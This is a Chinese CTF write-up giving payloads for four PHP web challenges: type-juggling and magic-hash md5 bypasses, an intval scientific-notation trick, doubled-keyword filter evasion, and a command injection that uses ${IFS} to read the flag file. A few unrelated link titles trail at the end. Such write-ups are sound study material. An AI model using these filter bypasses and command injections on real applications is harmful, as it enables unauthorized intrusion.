目錄
①[NSSCTF 2022 Spring Recruit]babyphp
②[鶴城杯 2021]Middle magic
③[WUSTCTF 2020]樸實無華
④[SWPUCTF 2022 新生賽]funny_php
明天中期考,先整理些小知識點冷靜一下
①[NSSCTF 2022 Spring Recruit]babyphp
payload:
?a[]=1&b1[]=1&b2[]=2&c1=s878926199a&c2=s155964671a
過于簡單,不解釋
②[鶴城杯 2021]Middle magic
payload:
?aaa=%0apass_the_level_1%23
admin[]=1&root_pwd[]=2&level_3={result:0}?
這里要注意一下level_3的json_decode,以鍵值對解析
③[WUSTCTF 2020]樸實無華
先看源碼
觸發關鍵詞bot
訪問/robots.txt
?
明顯一個假的flag,但還是訪問看看吧?
?
果然啥也沒有
掃個目錄看看也沒發現新東西
?
?抓包看看響應頭
(這藏得也忒深了吧)?
訪問/f14g.php
根據intval()函數的使用方法,當函數中用字符串方式表示科學計數法時,函數的返回值是科學計數法前面的一個數,而對于科學計數法加數字則會返回科學計數法的數值?
?num=2e4成功繞過
關于md5繞過
md5=0e215962017
?num=2e4&md5=0e215962017&get_flag=ls
回顯
過濾了空格和cat(等于沒過濾)
簡單繞過?
最終payload:
?num=2e4&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
④[SWPUCTF 2022 新生賽]funny_php
替換為空用雙寫繞過,其他比較常規,直接貼payload
POST /?num=9e9&str=NSSNSSCTFCTF HTTP/1.1
Host: node5.anna.nssctf.cn:28491
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node5.anna.nssctf.cn:28491/
Connection: close
Cookie: session=MTcwMDYzMTcyNnxEdi1CQkFFQ180SUFBUkFCRUFBQUhmLUNBQUVHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUF8t9dvoQKIlAnfzfb6ZJC50rfstdTr_SAkawzUZ9-gepw=; PHPSESSID=4e2a10fe298553aab03d80749522bc6a
Upgrade-Insecure-Requests: 1
Content-Length: 36
Content-Type: application/x-www-form-urlencodedmd5_1=s214587387a&md5_2=s1502113478a
求解微電網多目標優化調度(MATLAB代碼))
:函數遞歸與迭代,二者有什么區別)
)
)
